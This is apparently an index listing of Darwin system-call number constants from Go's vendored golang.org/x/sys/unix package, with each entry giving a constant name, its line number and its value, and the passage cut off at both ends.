| SYS_COPYFILE = 227 constant SYS_FGETATTRLIST (line 159) | SYS_FGETATTRLIST = 228 constant SYS_FSETATTRLIST (line 160) | SYS_FSETATTRLIST = 229 constant SYS_POLL (line 161) | SYS_POLL = 230 constant SYS_WATCHEVENT (line 162) | SYS_WATCHEVENT = 231 constant SYS_WAITEVENT (line 163) | SYS_WAITEVENT = 232 constant SYS_MODWATCH (line 164) | SYS_MODWATCH = 233 constant SYS_GETXATTR (line 165) | SYS_GETXATTR = 234 constant SYS_FGETXATTR (line 166) | SYS_FGETXATTR = 235 constant SYS_SETXATTR (line 167) | SYS_SETXATTR = 236 constant SYS_FSETXATTR (line 168) | SYS_FSETXATTR = 237 constant SYS_REMOVEXATTR (line 169) | SYS_REMOVEXATTR = 238 constant SYS_FREMOVEXATTR (line 170) | SYS_FREMOVEXATTR = 239 constant SYS_LISTXATTR (line 171) | SYS_LISTXATTR = 240 constant SYS_FLISTXATTR (line 172) | SYS_FLISTXATTR = 241 constant SYS_FSCTL (line 173) | SYS_FSCTL = 242 constant SYS_INITGROUPS (line 174) | SYS_INITGROUPS = 243 constant SYS_POSIX_SPAWN (line 175) | SYS_POSIX_SPAWN = 244 constant SYS_FFSCTL (line 176) | SYS_FFSCTL = 245 constant SYS_NFSCLNT (line 177) | SYS_NFSCLNT = 247 constant SYS_FHOPEN (line 178) | SYS_FHOPEN = 248 constant SYS_MINHERIT (line 179) | SYS_MINHERIT = 250 constant SYS_SEMSYS (line 180) | SYS_SEMSYS = 251 constant SYS_MSGSYS (line 181) | SYS_MSGSYS = 252 constant SYS_SHMSYS (line 182) | SYS_SHMSYS = 253 constant SYS_SEMCTL (line 183) | SYS_SEMCTL = 254 constant SYS_SEMGET (line 184) | SYS_SEMGET = 255 constant SYS_SEMOP (line 185) | SYS_SEMOP = 256 constant SYS_MSGCTL (line 186) | SYS_MSGCTL = 258 constant SYS_MSGGET (line 187) | SYS_MSGGET = 259 constant SYS_MSGSND (line 188) | SYS_MSGSND = 260 constant SYS_MSGRCV (line 189) | SYS_MSGRCV = 261 constant SYS_SHMAT (line 190) | SYS_SHMAT = 262 constant SYS_SHMCTL (line 191) | SYS_SHMCTL = 263 constant SYS_SHMDT (line 192) | SYS_SHMDT = 264 constant SYS_SHMGET (line 193) | SYS_SHMGET = 265 constant SYS_SHM_OPEN (line 194) | SYS_SHM_OPEN = 266 constant SYS_SHM_UNLINK (line 195) | SYS_SHM_UNLINK = 267 constant SYS_SEM_OPEN (line 196) | SYS_SEM_OPEN = 268 constant SYS_SEM_CLOSE (line 197) | SYS_SEM_CLOSE = 269 constant SYS_SEM_UNLINK (line 198) | SYS_SEM_UNLINK = 270 constant SYS_SEM_WAIT (line 199) | SYS_SEM_WAIT = 271 constant SYS_SEM_TRYWAIT (line 200) | SYS_SEM_TRYWAIT = 272 constant SYS_SEM_POST (line 201) | SYS_SEM_POST = 273 constant SYS_SYSCTLBYNAME (line 202) | SYS_SYSCTLBYNAME = 274 constant SYS_OPEN_EXTENDED (line 203) | SYS_OPEN_EXTENDED = 277 constant SYS_UMASK_EXTENDED (line 204) | SYS_UMASK_EXTENDED = 278 constant SYS_STAT_EXTENDED (line 205) | SYS_STAT_EXTENDED = 279 constant SYS_LSTAT_EXTENDED (line 206) | SYS_LSTAT_EXTENDED = 280 constant SYS_FSTAT_EXTENDED (line 207) | SYS_FSTAT_EXTENDED = 281 constant SYS_CHMOD_EXTENDED (line 208) | SYS_CHMOD_EXTENDED = 282 constant SYS_FCHMOD_EXTENDED (line 209) | SYS_FCHMOD_EXTENDED = 283 constant SYS_ACCESS_EXTENDED (line 210) | SYS_ACCESS_EXTENDED = 284 constant SYS_SETTID (line 211) | SYS_SETTID = 285 constant SYS_GETTID (line 212) | SYS_GETTID = 286 constant SYS_SETSGROUPS (line 213) | SYS_SETSGROUPS = 287 constant SYS_GETSGROUPS (line 214) | SYS_GETSGROUPS = 288 constant SYS_SETWGROUPS (line 215) | SYS_SETWGROUPS = 289 constant SYS_GETWGROUPS (line 216) | SYS_GETWGROUPS = 290 constant SYS_MKFIFO_EXTENDED (line 217) | SYS_MKFIFO_EXTENDED = 291 constant SYS_MKDIR_EXTENDED (line 218) | SYS_MKDIR_EXTENDED = 292 constant SYS_IDENTITYSVC (line 219) | SYS_IDENTITYSVC = 293 constant SYS_SHARED_REGION_CHECK_NP (line 220) | SYS_SHARED_REGION_CHECK_NP = 294 constant SYS_VM_PRESSURE_MONITOR (line 221) | SYS_VM_PRESSURE_MONITOR = 296 constant SYS_PSYNCH_RW_LONGRDLOCK (line 222) | SYS_PSYNCH_RW_LONGRDLOCK = 297 constant SYS_PSYNCH_RW_YIELDWRLOCK (line 223) | SYS_PSYNCH_RW_YIELDWRLOCK = 298 constant SYS_PSYNCH_RW_DOWNGRADE (line 224) | SYS_PSYNCH_RW_DOWNGRADE = 299 constant SYS_PSYNCH_RW_UPGRADE (line 225) | SYS_PSYNCH_RW_UPGRADE = 300 constant SYS_PSYNCH_MUTEXWAIT (line 226) | SYS_PSYNCH_MUTEXWAIT = 301 constant SYS_PSYNCH_MUTEXDROP (line 227) | SYS_PSYNCH_MUTEXDROP = 302 constant SYS_PSYNCH_CVBROAD (line 228) | SYS_PSYNCH_CVBROAD = 303 constant SYS_PSYNCH_CVSIGNAL (line 229) | SYS_PSYNCH_CVSIGNAL = 304 constant SYS_PSYNCH_CVWAIT (line 230) | SYS_PSYNCH_CVWAIT = 305 constant SYS_PSYNCH_RW_RDLOCK (line 231) | SYS_PSYNCH_RW_RDLOCK = 306 constant SYS_PSYNCH_RW_WRLOCK (line 232) | SYS_PSYNCH_RW_WRLOCK = 307 constant SYS_PSYNCH_RW_UNLOCK (line 233) | SYS_PSYNCH_RW_UNLOCK = 308 constant SYS_PSYNCH_RW_UNLOCK2 (line 234) | SYS_PSYNCH_RW_UNLOCK2 = 309 constant SYS_GETSID (line 235) | SYS_GETSID = 310 constant SYS_SETTID_WITH_PID (line 236) | SYS_SETTID_WITH_PID = 311 constant SYS_PSYNCH_CVCLRPREPOST (line 237) | SYS_PSYNCH_CVCLRPREPOST = 312 constant SYS_AIO_FSYNC (line 238) | SYS_AIO_FSYNC = 313 constant SYS_AIO_RETURN (line 239) | SYS_AIO_RETURN = 314 constant SYS_AIO_SUSPEND (line 240) | SYS_AIO_SUSPEND = 315 constant SYS_AIO_CANCEL (line 241) | SYS_AIO_CANCEL = 316 constant SYS_AIO_ERROR (line 242) | SYS_AIO_ERROR = 317 constant SYS_AIO_READ (line 243) | SYS_AIO_READ = 318 constant SYS_AIO_WRITE (line 244) | SYS_AIO_WRITE = 319 constant SYS_LIO_LISTIO (line 245) | SYS_LIO_LISTIO = 320 constant SYS_IOPOLICYSYS (line 246) | SYS_IOPOLICYSYS = 322 constant SYS_PROCESS_POLICY (line 247) | SYS_PROCESS_POLICY = 323 constant SYS_MLOCKALL (line 248) | SYS_MLOCKALL = 324 constant SYS_MUNLOCKALL (line 249) | SYS_MUNLOCKALL = 325 constant SYS_ISSETUGID (line 250) | SYS_ISSETUGID = 327 constant SYS___PTHREAD_KILL (line 251) | SYS___PTHREAD_KILL = 328 constant SYS___PTHREAD_SIGMASK (line 252) | SYS___PTHREAD_SIGMASK = 329 constant SYS___SIGWAIT (line 253) | SYS___SIGWAIT = 330 constant SYS___DISABLE_THREADSIGNAL (line 254) | SYS___DISABLE_THREADSIGNAL = 331 constant SYS___PTHREAD_MARKCANCEL (line 255) | SYS___PTHREAD_MARKCANCEL = 332 constant SYS___PTHREAD_CANCELED (line 256) | SYS___PTHREAD_CANCELED = 333 constant SYS___SEMWAIT_SIGNAL (line 257) | SYS___SEMWAIT_SIGNAL = 334 constant SYS_PROC_INFO (line 258) | SYS_PROC_INFO = 336 constant SYS_SENDFILE (line 259) | SYS_SENDFILE = 337 constant SYS_STAT64 (line 260) | SYS_STAT64 = 338 constant SYS_FSTAT64 (line 261) | SYS_FSTAT64 = 339 constant SYS_LSTAT64 (line 262) | SYS_LSTAT64 = 340 constant SYS_STAT64_EXTENDED (line 263) | SYS_STAT64_EXTENDED = 341 constant SYS_LSTAT64_EXTENDED (line 264) | SYS_LSTAT64_EXTENDED = 342 constant SYS_FSTAT64_EXTENDED (line 265) | SYS_FSTAT64_EXTENDED = 343 constant SYS_GETDIRENTRIES64 (line 266) | SYS_GETDIRENTRIES64 = 344 constant SYS_STATFS64 (line 267) | SYS_STATFS64 = 345 constant SYS_FSTATFS64 (line 268) | SYS_FSTATFS64 = 346 constant SYS_GETFSSTAT64 (line 269) | SYS_GETFSSTAT64 = 347 constant SYS___PTHREAD_CHDIR (line 270) | SYS___PTHREAD_CHDIR = 348 constant SYS___PTHREAD_FCHDIR (line 271) | SYS___PTHREAD_FCHDIR = 349 constant SYS_AUDIT (line 272) | SYS_AUDIT = 350 constant SYS_AUDITON (line 273) | SYS_AUDITON = 351 constant SYS_GETAUID (line 274) | SYS_GETAUID = 353 constant SYS_SETAUID (line 275) | SYS_SETAUID = 354 constant SYS_GETAUDIT_ADDR (line 276) | SYS_GETAUDIT_ADDR = 357 constant SYS_SETAUDIT_ADDR (line 277) | SYS_SETAUDIT_ADDR = 358 constant SYS_AUDITCTL (line 278) | SYS_AUDITCTL = 359 constant SYS_BSDTHREAD_CREATE (line 279) | SYS_BSDTHREAD_CREATE = 360 constant SYS_BSDTHREAD_TERMINATE (line 280) | SYS_BSDTHREAD_TERMINATE = 361 constant SYS_KQUEUE (line 281) | SYS_KQUEUE = 362 constant SYS_KEVENT (line 282) | SYS_KEVENT = 363 constant SYS_LCHOWN (line 283) | SYS_LCHOWN = 364 constant SYS_BSDTHREAD_REGISTER (line 284) | SYS_BSDTHREAD_REGISTER = 366 constant SYS_WORKQ_OPEN (line 285) | SYS_WORKQ_OPEN = 367 constant SYS_WORKQ_KERNRETURN (line 286) | SYS_WORKQ_KERNRETURN = 368 constant SYS_KEVENT64 (line 287) | SYS_KEVENT64 = 369 constant SYS___OLD_SEMWAIT_SIGNAL (line 288) | SYS___OLD_SEMWAIT_SIGNAL = 370 constant SYS___OLD_SEMWAIT_SIGNAL_NOCANCEL (line 289) | SYS___OLD_SEMWAIT_SIGNAL_NOCANCEL = 371 constant SYS_THREAD_SELFID (line 290) | SYS_THREAD_SELFID = 372 constant SYS_LEDGER (line 291) | SYS_LEDGER = 373 constant SYS_KEVENT_QOS (line 292) | SYS_KEVENT_QOS = 374 constant SYS_KEVENT_ID (line 293) | SYS_KEVENT_ID = 375 constant SYS___MAC_EXECVE (line 294) | SYS___MAC_EXECVE = 380 constant SYS___MAC_SYSCALL (line 295) | SYS___MAC_SYSCALL = 381 constant SYS___MAC_GET_FILE (line 296) | SYS___MAC_GET_FILE = 382 constant SYS___MAC_SET_FILE (line 297) | SYS___MAC_SET_FILE = 383 constant SYS___MAC_GET_LINK (line 298) | SYS___MAC_GET_LINK = 384 constant SYS___MAC_SET_LINK (line 299) | SYS___MAC_SET_LINK = 385 constant SYS___MAC_GET_PROC (line 300) | SYS___MAC_GET_PROC = 386 constant SYS___MAC_SET_PROC (line 301) | SYS___MAC_SET_PROC = 387 constant SYS___MAC_GET_FD (line 302) | SYS___MAC_GET_FD = 388 constant SYS___MAC_SET_FD (line 303) | SYS___MAC_SET_FD = 389 constant SYS___MAC_GET_PID (line 304) | SYS___MAC_GET_PID = 390 constant SYS_PSELECT (line 305) | SYS_PSELECT = 394 constant SYS_PSELECT_NOCANCEL (line 306) | SYS_PSELECT_NOCANCEL = 395 constant SYS_READ_NOCANCEL (line 307) | SYS_READ_NOCANCEL = 396 constant SYS_WRITE_NOCANCEL (line 308) | SYS_WRITE_NOCANCEL = 397 constant SYS_OPEN_NOCANCEL (line 309) | SYS_OPEN_NOCANCEL = 398 constant SYS_CLOSE_NOCANCEL (line 310) | SYS_CLOSE_NOCANCEL = 399 constant SYS_WAIT4_NOCANCEL (line 311) | SYS_WAIT4_NOCANCEL = 400 constant SYS_RECVMSG_NOCANCEL (line 312) | SYS_RECVMSG_NOCANCEL = 401 constant SYS_SENDMSG_NOCANCEL (line 313) | SYS_SENDMSG_NOCANCEL = 402 constant SYS_RECVFROM_NOCANCEL (line 314) | SYS_RECVFROM_NOCANCEL = 403 constant SYS_ACCEPT_NOCANCEL (line 315) | SYS_ACCEPT_NOCANCEL = 404 constant SYS_MSYNC_NOCANCEL (line 316) | SYS_MSYNC_NOCANCEL = 405 constant SYS_FCNTL_NOCANCEL (line 317) | SYS_FCNTL_NOCANCEL = 406 constant SYS_SELECT_NOCANCEL (line 318) | SYS_SELECT_NOCANCEL = 407 constant SYS_FSYNC_NOCANCEL (line 319) | SYS_FSYNC_NOCANCEL = 408 constant SYS_CONNECT_NOCANCEL (line 320) | SYS_CONNECT_NOCANCEL = 409 constant SYS_SIGSUSPEND_NOCANCEL (line 321) | SYS_SIGSUSPEND_NOCANCEL = 410 constant SYS_READV_NOCANCEL (line 322) | SYS_READV_NOCANCEL = 411 constant SYS_WRITEV_NOCANCEL (line 323) | SYS_WRITEV_NOCANCEL = 412 constant SYS_SENDTO_NOCANCEL (line 324) | SYS_SENDTO_NOCANCEL = 413 constant SYS_PREAD_NOCANCEL (line 325) | SYS_PREAD_NOCANCEL = 414 constant SYS_PWRITE_NOCANCEL (line 326) | SYS_PWRITE_NOCANCEL = 415 constant SYS_WAITID_NOCANCEL (line 327) | SYS_WAITID_NOCANCEL = 416 constant SYS_POLL_NOCANCEL (line 328) | SYS_POLL_NOCANCEL = 417 constant SYS_MSGSND_NOCANCEL (line 329) | SYS_MSGSND_NOCANCEL = 418 constant SYS_MSGRCV_NOCANCEL (line 330) | SYS_MSGRCV_NOCANCEL = 419 constant SYS_SEM_WAIT_NOCANCEL (line 331) | SYS_SEM_WAIT_NOCANCEL = 420 constant SYS_AIO_SUSPEND_NOCANCEL (line 332) | SYS_AIO_SUSPEND_NOCANCEL = 421 constant SYS___SIGWAIT_NOCANCEL (line 333) | SYS___SIGWAIT_NOCANCEL = 422 constant SYS___SEMWAIT_SIGNAL_NOCANCEL (line 334) | SYS___SEMWAIT_SIGNAL_NOCANCEL = 423 constant SYS___MAC_MOUNT (line 335) | SYS___MAC_MOUNT = 424 constant SYS___MAC_GET_MOUNT (line 336) | SYS___MAC_GET_MOUNT = 425 constant SYS___MAC_GETFSSTAT (line 337) | SYS___MAC_GETFSSTAT = 426 constant SYS_FSGETPATH (line 338) | SYS_FSGETPATH = 427 constant SYS_AUDIT_SESSION_SELF (line 339) | SYS_AUDIT_SESSION_SELF = 428 constant SYS_AUDIT_SESSION_JOIN (line 340) | SYS_AUDIT_SESSION_JOIN = 429 constant SYS_FILEPORT_MAKEPORT (line 341) | SYS_FILEPORT_MAKEPORT = 430 constant SYS_FILEPORT_MAKEFD (line 342) | SYS_FILEPORT_MAKEFD = 431 constant SYS_AUDIT_SESSION_PORT (line 343) | SYS_AUDIT_SESSION_PORT = 432 constant SYS_PID_SUSPEND (line 344) | SYS_PID_SUSPEND = 433 constant SYS_PID_RESUME (line 345) | SYS_PID_RESUME = 434 constant SYS_PID_HIBERNATE (line 346) | SYS_PID_HIBERNATE = 435 constant SYS_PID_SHUTDOWN_SOCKETS (line 347) | SYS_PID_SHUTDOWN_SOCKETS = 436 constant SYS_SHARED_REGION_MAP_AND_SLIDE_NP (line 348) | SYS_SHARED_REGION_MAP_AND_SLIDE_NP = 438 constant SYS_KAS_INFO (line 349) | SYS_KAS_INFO = 439 constant SYS_MEMORYSTATUS_CONTROL (line 350) | SYS_MEMORYSTATUS_CONTROL = 440 constant SYS_GUARDED_OPEN_NP (line 351) | SYS_GUARDED_OPEN_NP = 441 constant SYS_GUARDED_CLOSE_NP (line 352) | SYS_GUARDED_CLOSE_NP = 442 constant SYS_GUARDED_KQUEUE_NP (line 353) | SYS_GUARDED_KQUEUE_NP = 443 constant SYS_CHANGE_FDGUARD_NP (line 354) | SYS_CHANGE_FDGUARD_NP = 444 constant SYS_USRCTL (line 355) | SYS_USRCTL = 445 constant SYS_PROC_RLIMIT_CONTROL (line 356) | SYS_PROC_RLIMIT_CONTROL = 446 constant SYS_CONNECTX (line 357) | SYS_CONNECTX = 447 constant SYS_DISCONNECTX (line 358) | SYS_DISCONNECTX = 448 constant SYS_PEELOFF (line 359) | SYS_PEELOFF = 449 constant SYS_SOCKET_DELEGATE (line 360) | SYS_SOCKET_DELEGATE = 450 constant SYS_TELEMETRY (line 361) | SYS_TELEMETRY = 451 constant SYS_PROC_UUID_POLICY (line 362) | SYS_PROC_UUID_POLICY = 452 constant SYS_MEMORYSTATUS_GET_LEVEL (line 363) | SYS_MEMORYSTATUS_GET_LEVEL = 453 constant SYS_SYSTEM_OVERRIDE (line 364) | SYS_SYSTEM_OVERRIDE = 454 constant SYS_VFS_PURGE (line 365) | SYS_VFS_PURGE = 455 constant SYS_SFI_CTL (line 366) | SYS_SFI_CTL = 456 constant SYS_SFI_PIDCTL (line 367) | SYS_SFI_PIDCTL = 457 constant SYS_COALITION (line 368) | SYS_COALITION = 458 constant SYS_COALITION_INFO (line 369) | SYS_COALITION_INFO = 459 constant SYS_NECP_MATCH_POLICY (line 370) | SYS_NECP_MATCH_POLICY = 460 constant SYS_GETATTRLISTBULK (line 371) | SYS_GETATTRLISTBULK = 461 constant SYS_CLONEFILEAT (line 372) | SYS_CLONEFILEAT = 462 constant SYS_OPENAT (line 373) | SYS_OPENAT = 463 constant SYS_OPENAT_NOCANCEL (line 374) | SYS_OPENAT_NOCANCEL = 464 constant SYS_RENAMEAT (line 375) | SYS_RENAMEAT = 465 constant SYS_FACCESSAT (line 376) | SYS_FACCESSAT = 466 constant SYS_FCHMODAT (line 377) | SYS_FCHMODAT = 467 constant SYS_FCHOWNAT (line 378) | SYS_FCHOWNAT = 468 constant SYS_FSTATAT (line 379) | SYS_FSTATAT = 469 constant SYS_FSTATAT64 (line 380) | SYS_FSTATAT64 = 470 constant SYS_LINKAT (line 381) | SYS_LINKAT = 471 constant SYS_UNLINKAT (line 382) | SYS_UNLINKAT = 472 constant SYS_READLINKAT (line 383) | SYS_READLINKAT = 473 constant SYS_SYMLINKAT (line 384) | SYS_SYMLINKAT = 474 constant SYS_MKDIRAT (line 385) | SYS_MKDIRAT = 475 constant SYS_GETATTRLISTAT (line 386) | SYS_GETATTRLISTAT = 476 constant SYS_PROC_TRACE_LOG (line 387) | SYS_PROC_TRACE_LOG = 477 constant SYS_BSDTHREAD_CTL (line 388) | SYS_BSDTHREAD_CTL = 478 constant SYS_OPENBYID_NP (line 389) | SYS_OPENBYID_NP = 479 constant SYS_RECVMSG_X (line 390) | SYS_RECVMSG_X = 480 constant SYS_SENDMSG_X (line 391) | SYS_SENDMSG_X = 481 constant SYS_THREAD_SELFUSAGE (line 392) | SYS_THREAD_SELFUSAGE = 482 constant SYS_CSRCTL (line 393) | SYS_CSRCTL = 483 constant SYS_GUARDED_OPEN_DPROTECTED_NP (line 394) | SYS_GUARDED_OPEN_DPROTECTED_NP = 484 constant SYS_GUARDED_WRITE_NP (line 395) | SYS_GUARDED_WRITE_NP = 485 constant SYS_GUARDED_PWRITE_NP (line 396) | SYS_GUARDED_PWRITE_NP = 486 constant SYS_GUARDED_WRITEV_NP (line 397) | SYS_GUARDED_WRITEV_NP = 487 constant SYS_RENAMEATX_NP (line 398) | SYS_RENAMEATX_NP = 488 constant SYS_MREMAP_ENCRYPTED (line 399) | SYS_MREMAP_ENCRYPTED = 489 constant SYS_NETAGENT_TRIGGER (line 400) | SYS_NETAGENT_TRIGGER = 490 constant SYS_STACK_SNAPSHOT_WITH_CONFIG (line 401) | SYS_STACK_SNAPSHOT_WITH_CONFIG = 491 constant SYS_MICROSTACKSHOT (line 402) | SYS_MICROSTACKSHOT = 492 constant SYS_GRAB_PGO_DATA (line 403) | SYS_GRAB_PGO_DATA = 493 constant SYS_PERSONA (line 404) | SYS_PERSONA = 494 constant SYS_WORK_INTERVAL_CTL (line 405) | SYS_WORK_INTERVAL_CTL = 499 constant SYS_GETENTROPY (line 406) | SYS_GETENTROPY = 500 constant SYS_NECP_OPEN (line 407) | SYS_NECP_OPEN = 501 constant SYS_NECP_CLIENT_ACTION (line 408) | SYS_NECP_CLIENT_ACTION = 502 constant SYS___NEXUS_OPEN (line 409) | SYS___NEXUS_OPEN = 503 constant SYS___NEXUS_REGISTER (line 410) | SYS___NEXUS_REGISTER = 504 constant SYS___NEXUS_DEREGISTER (line 411) | SYS___NEXUS_DEREGISTER = 505 constant SYS___NEXUS_CREATE (line 412) | SYS___NEXUS_CREATE = 506 constant SYS___NEXUS_DESTROY (line 413) | SYS___NEXUS_DESTROY = 507 constant SYS___NEXUS_GET_OPT (line 414) | SYS___NEXUS_GET_OPT = 508 constant SYS___NEXUS_SET_OPT (line 415) | SYS___NEXUS_SET_OPT = 509 constant SYS___CHANNEL_OPEN (line 416) | SYS___CHANNEL_OPEN = 510 constant SYS___CHANNEL_GET_INFO (line 417) | SYS___CHANNEL_GET_INFO = 511 constant SYS___CHANNEL_SYNC (line 418) | SYS___CHANNEL_SYNC = 512 constant SYS___CHANNEL_GET_OPT (line 419) | SYS___CHANNEL_GET_OPT = 513 constant SYS___CHANNEL_SET_OPT (line 420) | SYS___CHANNEL_SET_OPT = 514 constant SYS_ULOCK_WAIT (line 421) | SYS_ULOCK_WAIT = 515 constant SYS_ULOCK_WAKE (line 422) | SYS_ULOCK_WAKE = 516 constant SYS_FCLONEFILEAT (line 423) | SYS_FCLONEFILEAT = 517 constant SYS_FS_SNAPSHOT (line 424) | SYS_FS_SNAPSHOT = 518 constant SYS_TERMINATE_WITH_PAYLOAD (line 425) | SYS_TERMINATE_WITH_PAYLOAD = 520 constant SYS_ABORT_WITH_PAYLOAD (line 426) | SYS_ABORT_WITH_PAYLOAD = 521 constant SYS_NECP_SESSION_OPEN (line 427) | SYS_NECP_SESSION_OPEN = 522 constant SYS_NECP_SESSION_ACTION (line 428) | SYS_NECP_SESSION_ACTION = 523 constant SYS_SETATTRLISTAT (line 429) | SYS_SETATTRLISTAT = 524 constant SYS_NET_QOS_GUIDELINE (line 430) | SYS_NET_QOS_GUIDELINE = 525 constant SYS_FMOUNT (line 431) | SYS_FMOUNT = 526 constant SYS_NTP_ADJTIME (line 432) | SYS_NTP_ADJTIME = 527 constant SYS_NTP_GETTIME (line 433) | SYS_NTP_GETTIME = 528 constant SYS_OS_FAULT_WITH_PAYLOAD (line 434) | SYS_OS_FAULT_WITH_PAYLOAD = 529 constant SYS_KQUEUE_WORKLOOP_CTL (line 435) | SYS_KQUEUE_WORKLOOP_CTL = 530 constant SYS___MACH_BRIDGE_REMOTE_TIME (line 436) | SYS___MACH_BRIDGE_REMOTE_TIME = 531 constant SYS_MAXSYSCALL (line 437) | SYS_MAXSYSCALL = 532 constant SYS_INVALID (line 438) | SYS_INVALID = 63 FILE: vendor/golang.org/x/sys/unix/zsysnum_darwin_arm64.go constant SYS_SYSCALL (line 10) | SYS_SYSCALL = 0 constant SYS_EXIT (line 11) | SYS_EXIT = 1 constant SYS_FORK (line 12) | SYS_FORK = 2 constant SYS_READ (line 13) | SYS_READ = 3 constant SYS_WRITE (line 14) | SYS_WRITE = 4 constant SYS_OPEN (line 15) | SYS_OPEN = 5 constant SYS_CLOSE (line 16) | SYS_CLOSE = 6 constant SYS_WAIT4 (line 17) | SYS_WAIT4 = 7 constant SYS_LINK (line 18) | SYS_LINK = 9 constant SYS_UNLINK (line 19) | SYS_UNLINK = 10 constant SYS_CHDIR (line 20) | SYS_CHDIR = 12 constant SYS_FCHDIR (line 21) | SYS_FCHDIR = 13 constant SYS_MKNOD (line 22) | SYS_MKNOD = 14 constant SYS_CHMOD (line 23) | SYS_CHMOD = 15 constant SYS_CHOWN (line 24) | SYS_CHOWN = 16 constant SYS_GETFSSTAT (line 25) | SYS_GETFSSTAT = 18 constant SYS_GETPID (line 26) | SYS_GETPID = 20 constant SYS_SETUID (line 27) | SYS_SETUID = 23 constant SYS_GETUID (line 28) | SYS_GETUID = 24 constant SYS_GETEUID (line 29) | SYS_GETEUID = 25 constant SYS_PTRACE (line 30) | SYS_PTRACE = 26 constant SYS_RECVMSG (line 31) | SYS_RECVMSG = 27 constant SYS_SENDMSG (line 32) | SYS_SENDMSG = 28 constant SYS_RECVFROM (line 33) | SYS_RECVFROM = 29 constant SYS_ACCEPT (line 34) | SYS_ACCEPT = 30 constant SYS_GETPEERNAME (line 35) | SYS_GETPEERNAME = 31 constant SYS_GETSOCKNAME (line 36) | SYS_GETSOCKNAME = 32 constant SYS_ACCESS (line 37) | SYS_ACCESS = 33 constant SYS_CHFLAGS (line 38) | SYS_CHFLAGS = 34 constant SYS_FCHFLAGS (line 39) | SYS_FCHFLAGS = 35 constant SYS_SYNC (line 40) | SYS_SYNC = 36 constant SYS_KILL (line 41) | SYS_KILL = 37 constant SYS_GETPPID (line 42) | SYS_GETPPID = 39 constant SYS_DUP (line 43) | SYS_DUP = 41 constant SYS_PIPE (line 44) | SYS_PIPE = 42 constant SYS_GETEGID (line 45) | SYS_GETEGID = 43 constant SYS_SIGACTION (line 46) | SYS_SIGACTION = 46 constant SYS_GETGID (line 47) | SYS_GETGID = 47 constant SYS_SIGPROCMASK (line 48) | SYS_SIGPROCMASK = 48 constant SYS_GETLOGIN (line 49) | SYS_GETLOGIN = 49 constant SYS_SETLOGIN (line 50) | SYS_SETLOGIN = 50 constant SYS_ACCT (line 51) | SYS_ACCT = 51 constant SYS_SIGPENDING (line 52) | SYS_SIGPENDING = 52 constant SYS_SIGALTSTACK (line 53) | SYS_SIGALTSTACK = 53 constant SYS_IOCTL (line 54) | SYS_IOCTL = 54 constant SYS_REBOOT (line 55) | SYS_REBOOT = 55 constant SYS_REVOKE (line 56) | SYS_REVOKE = 56 constant SYS_SYMLINK (line 57) | SYS_SYMLINK = 57 constant SYS_READLINK (line 58) | SYS_READLINK = 58 constant SYS_EXECVE (line 59) | SYS_EXECVE = 59 constant SYS_UMASK (line 60) | SYS_UMASK = 60 constant SYS_CHROOT (line 61) | SYS_CHROOT = 61 constant SYS_MSYNC (line 62) | SYS_MSYNC = 65 constant SYS_VFORK (line 63) | SYS_VFORK = 66 constant SYS_MUNMAP (line 64) | SYS_MUNMAP = 73 constant SYS_MPROTECT (line 65) | SYS_MPROTECT = 74 constant SYS_MADVISE (line 66) | SYS_MADVISE = 75 constant SYS_MINCORE (line 67) | SYS_MINCORE = 78 constant SYS_GETGROUPS (line 68) | SYS_GETGROUPS = 79 constant SYS_SETGROUPS (line 69) | SYS_SETGROUPS = 80 constant SYS_GETPGRP (line 70) | SYS_GETPGRP = 81 constant SYS_SETPGID (line 71) | SYS_SETPGID = 82 constant SYS_SETITIMER (line 72) | SYS_SETITIMER = 83 constant SYS_SWAPON (line 73) | SYS_SWAPON = 85 constant SYS_GETITIMER (line 74) | SYS_GETITIMER = 86 constant SYS_GETDTABLESIZE (line 75) | SYS_GETDTABLESIZE = 89 constant SYS_DUP2 (line 76) | SYS_DUP2 = 90 constant SYS_FCNTL (line 77) | SYS_FCNTL = 92 constant SYS_SELECT (line 78) | SYS_SELECT = 93 constant SYS_FSYNC (line 79) | SYS_FSYNC = 95 constant SYS_SETPRIORITY (line 80) | SYS_SETPRIORITY = 96 constant SYS_SOCKET (line 81) | SYS_SOCKET = 97 constant SYS_CONNECT (line 82) | SYS_CONNECT = 98 constant SYS_GETPRIORITY (line 83) | SYS_GETPRIORITY = 100 constant SYS_BIND (line 84) | SYS_BIND = 104 constant SYS_SETSOCKOPT (line 85) | SYS_SETSOCKOPT = 105 constant SYS_LISTEN (line 86) | SYS_LISTEN = 106 constant SYS_SIGSUSPEND (line 87) | SYS_SIGSUSPEND = 111 constant SYS_GETTIMEOFDAY (line 88) | SYS_GETTIMEOFDAY = 116 constant SYS_GETRUSAGE (line 89) | SYS_GETRUSAGE = 117 constant SYS_GETSOCKOPT (line 90) | SYS_GETSOCKOPT = 118 constant SYS_READV (line 91) | SYS_READV = 120 constant SYS_WRITEV (line 92) | SYS_WRITEV = 121 constant SYS_SETTIMEOFDAY (line 93) | SYS_SETTIMEOFDAY = 122 constant SYS_FCHOWN (line 94) | SYS_FCHOWN = 123 constant SYS_FCHMOD (line 95) | SYS_FCHMOD = 124 constant SYS_SETREUID (line 96) | SYS_SETREUID = 126 constant SYS_SETREGID (line 97) | SYS_SETREGID = 127 constant SYS_RENAME (line 98) | SYS_RENAME = 128 constant SYS_FLOCK (line 99) | SYS_FLOCK = 131 constant SYS_MKFIFO (line 100) | SYS_MKFIFO = 132 constant SYS_SENDTO (line 101) | SYS_SENDTO = 133 constant SYS_SHUTDOWN (line 102) | SYS_SHUTDOWN = 134 constant SYS_SOCKETPAIR (line 103) | SYS_SOCKETPAIR = 135 constant SYS_MKDIR (line 104) | SYS_MKDIR = 136 constant SYS_RMDIR (line 105) | SYS_RMDIR = 137 constant SYS_UTIMES (line 106) | SYS_UTIMES = 138 constant SYS_FUTIMES (line 107) | SYS_FUTIMES = 139 constant SYS_ADJTIME (line 108) | SYS_ADJTIME = 140 constant SYS_GETHOSTUUID (line 109) | SYS_GETHOSTUUID = 142 constant SYS_SETSID (line 110) | SYS_SETSID = 147 constant SYS_GETPGID (line 111) | SYS_GETPGID = 151 constant SYS_SETPRIVEXEC (line 112) | SYS_SETPRIVEXEC = 152 constant SYS_PREAD (line 113) | SYS_PREAD = 153 constant SYS_PWRITE (line 114) | SYS_PWRITE = 154 constant SYS_NFSSVC (line 115) | SYS_NFSSVC = 155 constant SYS_STATFS (line 116) | SYS_STATFS = 157 constant SYS_FSTATFS (line 117) | SYS_FSTATFS = 158 constant SYS_UNMOUNT (line 118) | SYS_UNMOUNT = 159 constant SYS_GETFH (line 119) | SYS_GETFH = 161 constant 